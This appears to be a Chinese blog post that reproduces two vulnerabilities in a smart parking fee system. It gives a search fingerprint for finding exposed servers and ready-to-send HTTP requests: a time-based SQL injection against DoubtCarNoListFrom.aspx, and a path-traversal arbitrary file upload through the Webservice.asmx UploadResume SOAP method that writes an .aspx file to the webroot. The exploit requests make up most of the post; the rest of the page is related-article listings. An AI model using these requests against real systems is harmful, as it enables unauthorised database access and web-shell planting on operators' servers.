漏洞复现:科拓全智能停车收费系统SQL注入+任意文件上传

最新推荐文章于 2025-05-05 20:07:58 发布
最新推荐文章于 2025-05-05 20:07:58 发布
阅读量943 收藏
点赞数 10
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42207802/article/details/139002532
版权

语法

body="/KT_Css/qd_defaul.css"

在这里插入图片描述

特征

在这里插入图片描述

SQL注入复现

时间盲注:

POST /KT_Admin/CarCard/DoubtCarNoListFrom.aspx HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 41

start=0&limit=20&filer=1;SELECT SLEEP(5)#

在这里插入图片描述

任意文件上传复现

POST /Webservice.asmx HTTP/1.1
Host: ip
Content-Type: text/xml; charset=utf-8
Content-Length: 455
SOAPAction: "http://tempuri.org/UploadResume"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <UploadResume xmlns="http://tempuri.org/">
      <ip>1</ip>
      <fileName>../../../../test7.aspx</fileName>
      <fileFlow>dGVzdA==</fileFlow>
      <tag>3</tag>
    </UploadResume>
  </soap:Body>
</soap:Envelope>

内容使用base64 编码

在这里插入图片描述
在这里插入图片描述

上传地址

http://ip/test7.aspx

在这里插入图片描述

全智能停车收费系统 Webservice.asmx 任意文件上传漏洞复现
0xSec
05-17 1046
全智能停车收费系统 Webservice.asmx接口处存在任意文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
全智能停车收费系统 DoubtCarNoListFrom.aspx SQL注入漏洞复现
0xSec
05-16 725
全智能停车收费系统 DoubtCarNoListFrom.aspx 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。
停车场后台管理系统 ToLogin SQL注入漏洞复现
0xSec
08-16 706
停车场后台管理系统 ToLogin 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
http://tempuri.org 是什么?
热门推荐
Mandy的专栏
11-10 1万+
每个XML Web服务需要一个唯一的命名空间,以便客户端应用程序在网络上区别于其它服务。默认情况下,ASP.Net Web服务使用http://tempuri.org/用于这一目的。虽然这为XML Web服务正在开发适合发布的服务应该使用一个独特的,永久的命名空间。 您的XML Web服务应该是确定了一个命名空间,你的控制。例如,你可以使用命名空间的一部分公司的Internet域
全智能停车收费系统T_SellFrom.aspx存在SQL注入漏洞
缘梦未来的博客
12-04 451
智能停车场收费管理系统基于云计算、物联网、大数据等前沿技术,主要包括车辆管理、收费管理、数据监控和远程管理等四大模块。系统通过创新的硬件设备、智能软件及互联网技术,实现了自助缴费、无人值守、自动识别、自动寻车等智能化服务,提高了停车场的运营效率和服务质量。
全智能停车收费系统T_SellFrom.aspx SQL注入
2403_89452275的博客
12-03 422
全智能停车收费系统中的 T_SellFrom.aspx 页面存在 SQL 注入漏洞。该漏洞源于系统在处理用户输入时,未对输入的数据进行充分的过滤和参数化处理,导致攻击者可以构造恶意的 SQL 查询语句,进而操控数据库。
捷顺技VS五洋停车VS股份:智能停车系统产业链2021年9月跟踪报告.pdf
09-12
智能停车系统产业链在2021年9月的跟踪报告主要关注了捷顺技、五洋停车股份这三家行业内的领先企业。报告指出,智能停车系统属于汽车后市场和智慧交通市场的细分领域,尽管新能源汽车产业链的某些环节可能...
智能停车视频引导系统资料.doc
08-04
智能停车视频引导系统是现代城市交通管理中的一个重要组成部分,它结合了先进的信息技术,如车牌自动识别、视频监控、停车诱导和移动应用,旨在提供高效、便捷的停车服务。以下是该系统的详细解读: 一、车牌自动...
WEBSERVICE 大文件上传,断点续传分段
weixin_52041354的博客
09-18 1102
前端:vue2,vue3,vue-cli,html,jquery后端:asp.net,.net core数据库:SQL Server,MySQL,Oracle,达梦,人大金仓,国产数据库功能:大文件上传下载,断点续传,文件夹上传下载,加密传输,加密存储,云对象存储该说不说,最近这块挻火的,今天早上又有网友加我微信,实际上我的微信号之前就已经在网上公开了,但是很多网友还是说找不到,这个就真没办法了。
IEEE会议:第十届网络安全与信息工程国际会议(ICCSIE 2025)
iaast的博客
04-28 688
2025西部信息工程与技术学术论坛暨第十届网络安全与信息工程国际会议(10th International Conference on Cyber Security and Information Engineering)将于7月23-25日西宁召开。本届会议由北京工业大学、青海理工学院主办,浙江工业大学协办,IEEE计算机学会(IEEE Computer Society)技术赞助。
2025蓝桥杯省赛网络安全组wp
2301_79035389的博客
04-27 1553
这个也是在赛后才想明白,aes加密用的是十六字节,将前十一个都填成AAAA发过去,因为ecb模式是分组加密,每一组的加密过程都是一样的,所以不需要写脚本还原加密过程去破解(其实硬写也做不到,因为拿不到key,当时我觉得用户名肯定是key,不然解不了,于是就一直卡在这一步了,实际上用户名是明文),直接将发过来的加密数据取出后几组就是admin的加密了。首先是一个按位与,我们都知道,如果gift的结果是1,那说明参与按位与的两个数在对应位置上一定是1.这道题想到思路了,但是忘记dfs怎么写了,脚本没写出来。
网络安全零基础培训 L1-9 PHP连接MySQL数据库
2401_86544210的博客
05-01 833
MySQLi是 PHP 用于与 MySQL 数据库进行交互的扩展。
2024 网络安全回顾与 2025 展望:守护数字世界的新征程
weixin_43172311的博客
05-01 790
数据来源:安全内参在当今数字化时代,网络如同一张无形的大网,将世界紧密相连。我们在享受网络带来便捷的同时,也面临着日益严峻的网络安全挑战。今天,就让我们一起来回顾 2024 年网络安全产业的发展态势,并展望一下 2025 年的趋势。
等保系列(一):网络安全等级保护介绍
zakefine的博客
05-01 1099
网络安全等级保护(以下简称:等保)是根据《中华人民共和国网络安全法》及配套规定(如《信息安全技术 网络安全等级保护基本要求》等)建立的系统性安全防护机制,要求网络运营者根据信息系统的重要性及受破坏后的影响程度,实施不同等级的安全防护。
Socat 用法详解:网络安全中的瑞士军刀
vortex5的博客
05-03 1791
socat是一个多功能的中继工具,允许用户在两个数据通道之间建立双向数据流。这些通道可以是文件、管道、设备(如串口或伪终端)、网络套接字(TCP、UDP、Unix 域套接字等),甚至可以通过 SSL/TLS 进行加密传输。与netcat(另一款类似工具)相比,socat安全性增强:支持chroot、用户切换(su)和 SSL/TLS 加密。灵活性:支持多种协议和地址类型,允许复杂的数据流配置。多进程处理:通过fork选项支持并发连接。调试功能:提供详细的日志和数据流监控选项(如-x和-v。
网络安全自动化:找准边界才能筑牢安全防线
最新发布
weixin_43172311的博客
05-05 1029
机器负责"体力活":扫描、监控、重复性操作人类专注"脑力活":策略制定、异常判断、关键决策就像机场安检,金属探测器自动报警,但开箱检查必须由安检员完成。找准自动化边界,才能既提升效率又守住安全底线。推荐更多阅读内容信创时代:分布式数据库备份的5大生死局与破解之道警惕!勒索软件攻击肆虐,企业该如何应对2024网络安全回顾与2025展望:守护数字世界的新征程无密码认证:告别记密码烦恼,未来登录可以多简单当AI学会自己“长脑子”:自进化系统的网络安全风险指南。
学习黑客 week1周测 & 复盘
qq_41179365的博客
05-04 1652
(此处请用第一人称完成,你也可以参考以下思路并结合自己的收获与挑战撰写。本周我完成了 Week 1 的“安全基础理论入门”阶段,对信息安全的全局有了清晰的认识。Day 1 学习了 CIA 三要素,能用实例区分机密性、完整性和可用性;Day 2 探究了 OWASP Top 10,亲手制作思维导图加深了漏洞分类;Day 3 通过 ATVR 风险模型和攻击生命周期的对应,首次将抽象风险量化并绘制成脑图;Day 4 理解了中国《网络安全法》及等保 2.0 的核心红线,并制作了“法律速查卡”;
网络安全sql注入练习靶场——sqli_labs安装保姆级教程
weixin_71914594的博客
05-03 743
sqli-labs靶场是一个开源的sql注入练习的综合靶场,包含大部分sql注入漏洞以及注入方式网络安全学习者可以通过在sqli-labs靶场练习提升对sql注入的理解,以及学习各种绕过姿势。以便更好的学习网络安全,有攻才有防,加强网络安全学习者对sql注入漏洞的攻击与防御。(本篇文章仅供网络安全学习者学习,禁止任何未授权渗透攻击。
Java 网络安全新技术:构建面向未来的防御体系
qq_20294455的博客
05-03 1642
Java 网络安全技术正经历从被动防御到主动免疫的范式转变。Java 24 的后量子密码学、Spring Security 6.0 的架构升级、容器化安全实践以及 AI 驱动的安全工具,共同构建起面向未来的防御体系。开发者需紧跟技术趋势,将安全融入开发全流程,在效率与安全之间找到平衡点。未来,Java 安全将进一步向自动化、智能化、量子抗性方向演进,为企业数字化转型提供坚实保障。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值